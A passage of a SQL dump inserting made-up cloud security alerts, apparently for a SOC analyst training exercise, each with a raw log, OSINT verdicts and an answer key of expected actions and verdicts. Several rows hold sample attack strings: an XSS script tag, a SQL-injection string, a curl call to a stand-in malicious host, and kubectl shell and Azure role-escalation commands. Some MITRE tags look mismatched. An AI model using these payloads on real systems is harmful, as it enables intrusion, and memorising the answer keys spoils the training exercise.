hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2041, 'Prisma Cloud Kubernetes Cluster Compromise', 'critical', 'Prisma Cloud', 'Unauthorized access to Kubernetes API server detected. Potential compromise of cluster nodes and services.', 'Lateral Movement', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:37:56Z\",\"event_type\":\"api_call\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"192.168.2.100\",\"username\":\"kube-admin\",\"hostname\":\"kube-api-server\",\"request_body\":\"kubectl exec -it pod-name -- /bin/bash\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized Kubernetes access\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"kubectl exec -it pod-name -- /bin/bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution detected in Kubernetes environment\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized command execution suggests a compromise in the Kubernetes cluster.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2042, 'Wiz Serverless Function Exploitation Attempt', 'high', 'Wiz', 'Exploit attempt against serverless function detected. Malicious payload used to gain unauthorized access.', 'Web Attack', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:55:21Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.99\",\"dst_ip\":\"192.168.3.15\",\"username\":\"function-user\",\"hostname\":\"api.serverless.com\",\"request_body\":\"<script>alert(\'Exploit\')</script>\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP flagged for web-based exploits\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"<script>alert(\'Exploit\')</script>\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"XSS payload detected in serverless function request\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of a malicious script in the request indicates an attempted web-based exploitation.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2043, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'A potential data leak has been detected from an AWS S3 bucket. An external IP has accessed sensitive files.', 'Data Exfil', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:30:00Z\",\"event_type\":\"s3_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.100\",\"username\":\"john_doe\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data/file.txt\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Employee account used in unauthorized access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP accessing sensitive files is a clear indicator of a data leak.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2044, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An unauthorized privilege escalation attempt was detected in Azure IAM. Anomalous activity from a known account.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:45:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin_user\",\"hostname\":\"azure.portal.com\",\"command_line\":\"az role assignment create --assignee admin_user --role Owner\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with privilege escalation attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"az role assignment create --assignee admin_user --role Owner\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for unauthorized privilege escalation\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command line used is a clear indicator of an attempt to escalate privileges.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2045, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'Suspicious activity detected from a GCP service account, indicating potential hijacking.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:20:00Z\",\"event_type\":\"api_call\",\"src_ip\":\"192.0.2.50\",\"dst_ip\":\"10.1.2.3\",\"username\":\"gcp-service-account\",\"hostname\":\"cloud.google.com\",\"request_body\":\"POST /v1/projects/my-project/serviceAccounts:signBlob\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to service account hijacking incidents\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"gcp-service-account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"Service account involved in unauthorized API calls\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The repeated unauthorized API calls suggest service account hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2046, 'Unauthorized Kubernetes Access via Prisma Cloud', 'high', 'Prisma Cloud', 'Detected unauthorized access to Kubernetes cluster from a suspicious IP address.', 'Lateral Movement', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"k8s_access\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"10.2.3.4\",\"username\":\"k8s-admin\",\"hostname\":\"k8s-cluster.local\",\"command_line\":\"kubectl exec -it pod-name -- /bin/bash\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous unauthorized Kubernetes access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec -it pod-name -- /bin/bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in unauthorized access to Kubernetes pods\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized kubectl exec command demonstrates lateral movement within the cluster.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2047, 'Serverless Function Exploitation Detected via Wiz', 'medium', 'Wiz', 'A serverless function was exploited to execute malicious payloads from an external source.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:00Z\",\"event_type\":\"function_execution\",\"src_ip\":\"198.51.100.5\",\"dst_ip\":\"10.3.4.5\",\"username\":\"lambda-function\",\"hostname\":\"aws.lambda.amazonaws.com\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for SQL injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a classic SQL injection, indicating an attempt to exploit serverless functions.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2048, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Unauthorized access to an S3 bucket containing sensitive data was detected from an external IP.', 'Data Exfil', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:12:45Z\",\"event_type\":\"data_access\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"john.doe\",\"hostname\":\"aws-s3-bucket\",\"request_body\":\"GET /sensitive-data\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Legitimate user account but suspected of compromise\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"notify_data_owner\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"External IP accessing sensitive internal data is a clear indicator of data exfiltration.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2049, 'Azure IAM Privilege Escalation Detected', 'high', 'Azure Defender', 'A user account was detected attempting privilege escalation on Azure IAM, potentially indicating unauthorized activity.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:47:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"203.0.113.78\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin_user\",\"hostname\":\"azure-iam\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple credential theft attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Privileged internal account used in escalation attempt\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"audit_logs\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Attempted privilege escalation by external IP indicates compromise.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2050, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'Suspicious activity detected on a GCP service account, indicating a possible hijacking attempt.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:22:11Z\",\"event_type\":\"login_success\",\"src_ip\":\"185.199.110.34\",\"dst_ip\":\"10.1.1.15\",\"username\":\"service-account\",\"hostname\":\"gcp-instance\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.110.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known hijacking campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"GCP service account suspected of being compromised\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"enable_logging\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Service account access from a known malicious IP indicates hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2051, 'Suspicious Kubernetes Cluster Activity', 'high', 'Prisma Cloud', 'Detected suspicious command execution in Kubernetes cluster indicating potential unauthorized access.', 'Lateral Movement', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:00:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"10.2.2.20\",\"username\":\"kube-admin\",\"hostname\":\"k8s-node\",\"request_body\":\"\",\"command_line\":\"kubectl exec -it pod -- /bin/sh\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized Kubernetes access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec -it pod -- /bin/sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command execution in Kubernetes cluster without authorization\"}}],\"expected_actions\":[\"isolate_host\",\"audit_logs\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unauthorized command execution on Kubernetes indicates potential lateral movement.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2052, 'Serverless Function Misuse Detected', 'medium', 'Wiz', 'A serverless function was invoked with a suspicious payload indicating possible command injection.', 'Web Attack', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T18:45:25Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.0.2.123\",\"dst_ip\":\"10.3.3.30\",\"username\":\"anonymous\",\"hostname\":\"cloud-function\",\"request_body\":\"curl -s http://malicious.example.com\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with command injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"curl -s http://malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Payload indicates a command injection attempt\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\",\"notify_admin\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Suspicious payload execution on serverless function suggests command injection.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2053, 'AWS GuardDuty: Unauthorized S3 Bucket Access Detected', 'high', 'AWS GuardDuty', 'An unauthorized access to an S3 bucket was detected from an external IP address. The attacker accessed sensitive data.', 'Data Exfiltration', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"203.0.113.5\",\"username\":\"unauthorized_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Commonly used in brute force attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP accessing the S3 bucket indicates unauthorized access.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2054, 'Azure Defender: IAM Privilege Escalation Detected', 'critical', 'Azure Defender', 'A user account was granted elevated privileges without proper authorization. This may indicate a compromised account.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.40\",\"dst_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"hostname\":\"azure-vm1\",\"request_body\":\"\",\"command_line\":\"az role assignment create --role Owner --assignee compromised_user\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous privilege escalation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Involved in unauthorized role changes\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unauthorized role assignment indicates possible account compromise.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2055, 'GCP SCC: Service Account Hijacking Attempt', 'high', 'GCP SCC', 'A suspicious activity detected involving a service account using anomalous IP addresses, potentially indicating hijacking.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"10.128.0.3\",\"username\":\"service-account@myproject.iam.gserviceaccount.com\",\"hostname\":\"gcp-instance\",\"request_body\":\"\",\"command_line\":\"gcloud auth activate-service-account --key-file=/path/to/key.json\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for service account abuse\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@myproject.iam.gserviceaccount.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Service account involved in unusual access patterns\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The service account\'s unauthorized use by an external IP suggests hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2056, 'Prisma Cloud: Unauthorized Kubernetes API Access', 'high', 'Prisma Cloud', 'An unauthorized attempt to access the Kubernetes API server was detected from an external source.', 'Web Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:05:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"10.0.0.8\",\"username\":\"unknown\",\"hostname\":\"k8s-api-server\",\"request_body\":\"POST /api/v1/namespaces/default/pods\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized API access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"POST /api/v1/namespaces/default/pods\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Attempt to create unauthorized pods\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The external IP\'s unauthorized requests to the API server indicate a potential breach attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2057, 'Wiz: Serverless Function Invocation from Suspicious IP', 'medium', 'Wiz', 'A serverless function was invoked from an IP address known for suspicious activity, suggesting possible abuse.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.55\",\"dst_ip\":\"10.0.1.3\",\"username\":\"function-invoker\",\"hostname\":\"lambda-function\",\"request_body\":\"\",\"command_line\":\"aws lambda invoke --function-name myFunction\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with unauthorized serverless function invocations\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"function-invoker\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"User involved in anomalous invocation patterns\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The invocation from a known suspicious IP suggests potential misuse of serverless functions.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2058, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'A sensitive AWS S3 bucket was accessed from an unauthorized IP address. Possible data exfiltration attempt detected.', 'Data Exfiltration', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:23Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"203.0.113.5\",\"username\":\"unauthorized_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /bucket-name/important-data\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1203 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Username associated with multiple unauthorized access attempts\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"s3.amazonaws.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate AWS S3 endpoint\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unauthorized IP accessed a sensitive S3 bucket, indicating potential data leak.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2059, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An IAM user account attempted to escalate privileges using an admin account token. Detected unusual activity patterns.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:34Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"10.0.0.12\",\"username\":\"compromised_user\",\"hostname\":\"azure-portal\",\"request_body\":\"\",\"command_line\":\"az role assignment create --assignee compromised_user --role Contributor\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 654 times for credential stuffing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Username involved in abnormal privilege escalation attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee compromised_user --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in privilege escalation attacks\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Compromised user attempted privilege escalation, indicating a potential breach.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2060, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'A GCP service account was used from an unknown IP address to access critical resources. Potential hijacking detected.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:23:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"10.128.0.2\",\"username\":\"service-account@project.iam.gserviceaccount.com\",\"hostname\":\"gcp-project\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@project.iam.gserviceaccount.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account used in abnormal contexts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Unauthorized access to GCP service account detected, suggesting possible hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2061, 'Prisma Cloud Detection of Unauthorized Kubernetes Access', 'high', 'Prisma Cloud', 'A Kubernetes cluster was accessed by an external IP address not listed in the whitelist. Possible lateral movement attempt.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T07:50:10Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"10.1.2.3\",\"username\":\"kube-admin\",\"hostname\":\"k8s-cluster\",\"request_body\":\"\",\"command_line\":\"kubectl exec --kubeconfig /path/to/config\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for unauthorized Kubernetes access\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec --kubeconfig 